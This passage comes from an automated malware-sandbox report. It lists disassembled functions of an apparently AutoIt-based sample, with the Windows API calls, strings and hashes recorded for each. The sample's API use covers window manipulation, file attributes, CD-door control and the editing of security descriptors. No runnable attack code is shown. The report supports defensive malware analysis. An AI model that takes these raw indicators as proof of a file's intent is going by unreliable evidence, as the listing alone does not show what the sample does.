                              • Instruction Fuzzy Hash: C3A1D671204706AFDB18DF24C884FAAB7E9FF04355F20472AF999D2651DB30EA45CB92
                              Function 008DB397 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                              Download Yara Rule
                              APIs
                              • GetClassNameW.USER32(00000008,?,00000400), ref: 008DB3DB
                              • _wcscmp.LIBCMT ref: 008DB3EC
                              • GetWindowTextW.USER32(00000001,?,00000400), ref: 008DB414
                              • CharUpperBuffW.USER32(?,00000000), ref: 008DB431
                              • _wcscmp.LIBCMT ref: 008DB44F
                              • _wcsstr.LIBCMT ref: 008DB460
                              • GetClassNameW.USER32(00000018,?,00000400), ref: 008DB498
                              • _wcscmp.LIBCMT ref: 008DB4A8
                              • GetWindowTextW.USER32(00000002,?,00000400), ref: 008DB4CF
                              • GetClassNameW.USER32(00000018,?,00000400), ref: 008DB518
                              • _wcscmp.LIBCMT ref: 008DB528
                              • GetClassNameW.USER32(00000010,?,00000400), ref: 008DB550
                              • GetWindowRect.USER32(00000004,?), ref: 008DB5B9
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                              • String ID: @$ThumbnailClass
                              • API String ID: 1788623398-1539354611
                              • Opcode ID: 142a726ae5081e34633de3e845aeb76abe2051134246f51b63f1d658e2d08da1
                              • Instruction ID: ee4b2954f48f161b645e2de6d9be8a9b132019ce14e717b729c84051d4e09489
                              • Opcode Fuzzy Hash: 142a726ae5081e34633de3e845aeb76abe2051134246f51b63f1d658e2d08da1
                              • Instruction Fuzzy Hash: D181AD71008209DBDB14DF14D885FAA77E8FF54714F08866AFD85CA292DB30DE45CB62
                              Function 008DB1E0 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: __wcsnicmp
                              • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                              • API String ID: 1038674560-1810252412
                              • Opcode ID: 2bab5b5030cf63ec4bae2766e8d1a70acd1fea92a49a63a8240d0cdec71de75e
                              • Instruction ID: d43fd4d000b27aeea4a115d9477fc9671c0b5b788c795ac01f706672b71fb598
                              • Opcode Fuzzy Hash: 2bab5b5030cf63ec4bae2766e8d1a70acd1fea92a49a63a8240d0cdec71de75e
                              • Instruction Fuzzy Hash: 7831A236944209E6DB14FA64CD83FEE77B4FF14758F60012AB441F15D5EFA1AE04CA52
                              Function 008DC4C1 Relevance: 25.7, APIs: 17, Instructions: 169windowtimeCOMMON
                              Download Yara Rule
                              APIs
                              • LoadIconW.USER32(00000063), ref: 008DC4D4
                              • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 008DC4E6
                              • SetWindowTextW.USER32(?,?), ref: 008DC4FD
                              • GetDlgItem.USER32(?,000003EA), ref: 008DC512
                              • SetWindowTextW.USER32(00000000,?), ref: 008DC518
                              • GetDlgItem.USER32(?,000003E9), ref: 008DC528
                              • SetWindowTextW.USER32(00000000,?), ref: 008DC52E
                              • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 008DC54F
                              • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 008DC569
                              • GetWindowRect.USER32(?,?), ref: 008DC572
                              • SetWindowTextW.USER32(?,?), ref: 008DC5DD
                              • GetDesktopWindow.USER32 ref: 008DC5E3
                              • GetWindowRect.USER32(00000000), ref: 008DC5EA
                              • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 008DC636
                              • GetClientRect.USER32(?,?), ref: 008DC643
                              • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 008DC668
                              • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 008DC693
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                              • String ID:
                              • API String ID: 3869813825-0
                              • Opcode ID: 1c24ee73453f9ae533bf0ced183e558546911be89e29a0e7a412979fe0b21c75
                              • Instruction ID: 3e1698d8fcc4a92b46c806ad81f428a6fd88cc09e9944696e903430285d018d5
                              • Opcode Fuzzy Hash: 1c24ee73453f9ae533bf0ced183e558546911be89e29a0e7a412979fe0b21c75
                              • Instruction Fuzzy Hash: 20516E7190070AAFDB20DFA8DD85B6EBBF5FF04705F004A29E686E26A0C775E904DB50
                              Function 0090A428 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                              Download Yara Rule
                              APIs
                              • _memset.LIBCMT ref: 0090A4C8
                              • DestroyWindow.USER32(?,?), ref: 0090A542
                                • Part of subcall function 00887D2C: _memmove.LIBCMT ref: 00887D66
                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0090A5BC
                              • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0090A5DE
                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0090A5F1
                              • DestroyWindow.USER32(00000000), ref: 0090A613
                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00880000,00000000), ref: 0090A64A
                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0090A663
                              • GetDesktopWindow.USER32 ref: 0090A67C
                              • GetWindowRect.USER32(00000000), ref: 0090A683
                              • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0090A69B
                              • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0090A6B3
                                • Part of subcall function 008825DB: GetWindowLongW.USER32(?,000000EB), ref: 008825EC
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                              • String ID: 0$tooltips_class32
                              • API String ID: 1297703922-3619404913
                              • Opcode ID: a26b37ac315b4ce7b22cbbba19c0888497aa926eedc4e47861e643298db2ca1f
                              • Instruction ID: fe9d15dacaf969aafb57446fc33cd2e735bbf38ab3660b1a37169c15114ce4de
                              • Opcode Fuzzy Hash: a26b37ac315b4ce7b22cbbba19c0888497aa926eedc4e47861e643298db2ca1f
                              • Instruction Fuzzy Hash: 6A718671154305AFD720CF28CC49F6A7BFAFB89304F080928F985872A1C772A942DB92
                              Function 0090C8EE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00882612: GetWindowLongW.USER32(?,000000EB), ref: 00882623
                              • DragQueryPoint.SHELL32(?,?), ref: 0090C917
                                • Part of subcall function 0090ADF1: ClientToScreen.USER32(?,?), ref: 0090AE1A
                                • Part of subcall function 0090ADF1: GetWindowRect.USER32(?,?), ref: 0090AE90
                                • Part of subcall function 0090ADF1: PtInRect.USER32(?,?,0090C304), ref: 0090AEA0
                              • SendMessageW.USER32(?,000000B0,?,?), ref: 0090C980
                              • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0090C98B
                              • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0090C9AE
                              • _wcscat.LIBCMT ref: 0090C9DE
                              • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0090C9F5
                              • SendMessageW.USER32(?,000000B0,?,?), ref: 0090CA0E
                              • SendMessageW.USER32(?,000000B1,?,?), ref: 0090CA25
                              • SendMessageW.USER32(?,000000B1,?,?), ref: 0090CA47
                              • DragFinish.SHELL32(?), ref: 0090CA4E
                              • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0090CB41
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                              • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                              • API String ID: 169749273-3440237614
                              • Opcode ID: 4e1daef3a761cd58a8c974a0e56e27b3cf483e9ee75c16d4e87d687c6dc994be
                              • Instruction ID: dcb071adb37ad0560bf581424609046745eb2438cc217b5e87e51a61c0938040
                              • Opcode Fuzzy Hash: 4e1daef3a761cd58a8c974a0e56e27b3cf483e9ee75c16d4e87d687c6dc994be
                              • Instruction Fuzzy Hash: 766149B2108301AFC711EF64CC85D9BBBE8FFC9714F400A2EF592961A1DB709A49CB52
                              Function 00904619 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON
                              Download Yara Rule
                              APIs
                              • CharUpperBuffW.USER32(?,?), ref: 009046AB
                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 009046F6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: BuffCharMessageSendUpper
                              • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                              • API String ID: 3974292440-4258414348
                              • Opcode ID: d21e4bccc3a74ddbf189a147a74ff70524bad929694e176fa9496d7a82e51d54
                              • Instruction ID: 6669cd6ce9d985eb403c2165fa2e883931a9ac38df2b99ed7f50754458a9b1bf
                              • Opcode Fuzzy Hash: d21e4bccc3a74ddbf189a147a74ff70524bad929694e176fa9496d7a82e51d54
                              • Instruction Fuzzy Hash: 78917DB42043019FCB14EF14C891A6AB7E5FF85314F04896DF9969B7A2DB35ED06CB82
                              Function 0090BAB8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON
                              Download Yara Rule
                              APIs
                              • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0090BB6E
                              • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00906D80,?), ref: 0090BBCA
                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0090BC03
                              • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0090BC46
                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0090BC7D
                              • FreeLibrary.KERNEL32(?), ref: 0090BC89
                              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0090BC99
                              • DestroyIcon.USER32(?), ref: 0090BCA8
                              • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0090BCC5
                              • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0090BCD1
                                • Part of subcall function 008A313D: __wcsicmp_l.LIBCMT ref: 008A31C6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                              • String ID: .dll$.exe$.icl
                              • API String ID: 1212759294-1154884017
                              • Opcode ID: 43a8ac21611cfaac069e37e6dbbf6cc77a7f2962d2c692407bcaeaa62d8e00c1
                              • Instruction ID: 7308d472fe7bce1d653f7ed9369d64b3b5599c53ea9ccdeb1371d8ce4e96ecd8
                              • Opcode Fuzzy Hash: 43a8ac21611cfaac069e37e6dbbf6cc77a7f2962d2c692407bcaeaa62d8e00c1
                              • Instruction Fuzzy Hash: 8261CD72600229BEEB24DF68CC85FBE77ACFB08710F104619F955D61D1DB74AA90DBA0
                              Function 008EA5BD Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00889997: __itow.LIBCMT ref: 008899C2
                                • Part of subcall function 00889997: __swprintf.LIBCMT ref: 00889A0C
                              • CharLowerBuffW.USER32(?,?), ref: 008EA636
                              • GetDriveTypeW.KERNEL32 ref: 008EA683
                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 008EA6CB
                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 008EA702
                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 008EA730
                                • Part of subcall function 00887D2C: _memmove.LIBCMT ref: 00887D66
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                              • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                              • API String ID: 2698844021-4113822522
                              • Opcode ID: d98c04847815c56755c6f00380ee21d83bb12d3a147e93c918763e2001c8c4af
                              • Instruction ID: e47aab54268df5824340bd325016f92aea3914a826a74a2f2c52f9e32fca1d56
                              • Opcode Fuzzy Hash: d98c04847815c56755c6f00380ee21d83bb12d3a147e93c918763e2001c8c4af
                              • Instruction Fuzzy Hash: 495126751083049FC714EF29C89186AB7F8FF99718F14496CF896972A1DB31EE0ACB52
                              Function 008EA45A Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON
                              Download Yara Rule
                              APIs
                              • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 008EA47A
                              • __swprintf.LIBCMT ref: 008EA49C
                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 008EA4D9
                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 008EA4FE
                              • _memset.LIBCMT ref: 008EA51D
                              • _wcsncpy.LIBCMT ref: 008EA559
                              • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 008EA58E
                              • CloseHandle.KERNEL32(00000000), ref: 008EA599
                              • RemoveDirectoryW.KERNEL32(?), ref: 008EA5A2
                              • CloseHandle.KERNEL32(00000000), ref: 008EA5AC
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                              • String ID: :$\$\??\%s
                              • API String ID: 2733774712-3457252023
                              • Opcode ID: 7c03e4360233f1078b93bc733f3471d7e549e3e79374c0b4e6e9dd2d718c6b5e
                              • Instruction ID: 7f1bc0f69f25eacebe78f334856fa79a90ba89ea6eace7a1b6efba11800aceb9
                              • Opcode Fuzzy Hash: 7c03e4360233f1078b93bc733f3471d7e549e3e79374c0b4e6e9dd2d718c6b5e
                              • Instruction Fuzzy Hash: EC319DB1504249AADB20DFA5DC49FAB77BCFF89B41F1040B6FA08D6160E770A7448B25
                              Function 008BAB1B Relevance: 22.7, APIs: 15, Instructions: 211COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
                              • String ID:
                              • API String ID: 884005220-0
                              • Opcode ID: f41fe60fbeb08eeb0236b52bb3d9eb5bb7dcb5b5c51798553635d154f17b4531
                              • Instruction ID: e58c6df9a3d5da75c271ff92bce36de1c5776b2dd85c1df98f1cd55b5edd9ee0
                              • Opcode Fuzzy Hash: f41fe60fbeb08eeb0236b52bb3d9eb5bb7dcb5b5c51798553635d154f17b4531
                              • Instruction Fuzzy Hash: C8610472508615EFEB289F28DC42BA97BA9FF12731F14412AE811DB391DB35D940C7A3
                              Function 008EDB04 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON
                              Download Yara Rule
                              APIs
                              • __wsplitpath.LIBCMT ref: 008EDC7B
                              • _wcscat.LIBCMT ref: 008EDC93
                              • _wcscat.LIBCMT ref: 008EDCA5
                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 008EDCBA
                              • SetCurrentDirectoryW.KERNEL32(?), ref: 008EDCCE
                              • GetFileAttributesW.KERNEL32(?), ref: 008EDCE6
                              • SetFileAttributesW.KERNEL32(?,00000000), ref: 008EDD00
                              • SetCurrentDirectoryW.KERNEL32(?), ref: 008EDD12
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                              • String ID: *.*
                              • API String ID: 34673085-438819550
                              • Opcode ID: a2d3e980f4c1544d24ac5f320e410b2b13813524cc2b5ed215eed47616cca7ec
                              • Instruction ID: 1a3535c23669b1d74cc49fd2571b5b01ea5a7126d9eaf10edcd9cef602e47a45
                              • Opcode Fuzzy Hash: a2d3e980f4c1544d24ac5f320e410b2b13813524cc2b5ed215eed47616cca7ec
                              • Instruction Fuzzy Hash: BB81B3716083849FCB24EF29C84596AB7E8FF8A354F18882EF885C7250E730DD48CB52
                              Function 0090C49C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00882612: GetWindowLongW.USER32(?,000000EB), ref: 00882623
                              • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0090C4EC
                              • GetFocus.USER32 ref: 0090C4FC
                              • GetDlgCtrlID.USER32(00000000), ref: 0090C507
                              • _memset.LIBCMT ref: 0090C632
                              • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0090C65D
                              • GetMenuItemCount.USER32(?), ref: 0090C67D
                              • GetMenuItemID.USER32(?,00000000), ref: 0090C690
                              • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0090C6C4
                              • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0090C70C
                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0090C744
                              • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0090C779
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                              • String ID: 0
                              • API String ID: 1296962147-4108050209
                              • Opcode ID: e3bcae65b20950f2c2e367c19053a8e98ce054bc1cf6d1d9a10d8729202bd371
                              • Instruction ID: b8802dccc7a9f6bbe5d7999d954b9dfcd8debccb969f1d5b1c528e05d5048587
                              • Opcode Fuzzy Hash: e3bcae65b20950f2c2e367c19053a8e98ce054bc1cf6d1d9a10d8729202bd371
                              • Instruction Fuzzy Hash: D3818BB5608301AFD720DF24C884A6BBBE8FF89314F100A2DF99597291D771E945DFA2
                              Function 008D83F4 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 008D874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 008D8766
                                • Part of subcall function 008D874A: GetLastError.KERNEL32(?,008D822A,?,?,?), ref: 008D8770
                                • Part of subcall function 008D874A: GetProcessHeap.KERNEL32(00000008,?,?,008D822A,?,?,?), ref: 008D877F
                                • Part of subcall function 008D874A: HeapAlloc.KERNEL32(00000000,?,008D822A,?,?,?), ref: 008D8786
                                • Part of subcall function 008D874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 008D879D
                                • Part of subcall function 008D87E7: GetProcessHeap.KERNEL32(00000008,008D8240,00000000,00000000,?,008D8240,?), ref: 008D87F3
                                • Part of subcall function 008D87E7: HeapAlloc.KERNEL32(00000000,?,008D8240,?), ref: 008D87FA
                                • Part of subcall function 008D87E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,008D8240,?), ref: 008D880B
                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 008D8458
                              • _memset.LIBCMT ref: 008D846D
                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 008D848C
                              • GetLengthSid.ADVAPI32(?), ref: 008D849D
                              • GetAce.ADVAPI32(?,00000000,?), ref: 008D84DA
                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 008D84F6
                              • GetLengthSid.ADVAPI32(?), ref: 008D8513
                              • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 008D8522
                              • HeapAlloc.KERNEL32(00000000), ref: 008D8529
                              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 008D854A
                              • CopySid.ADVAPI32(00000000), ref: 008D8551
                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 008D8582
                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 008D85A8
                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 008D85BC
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
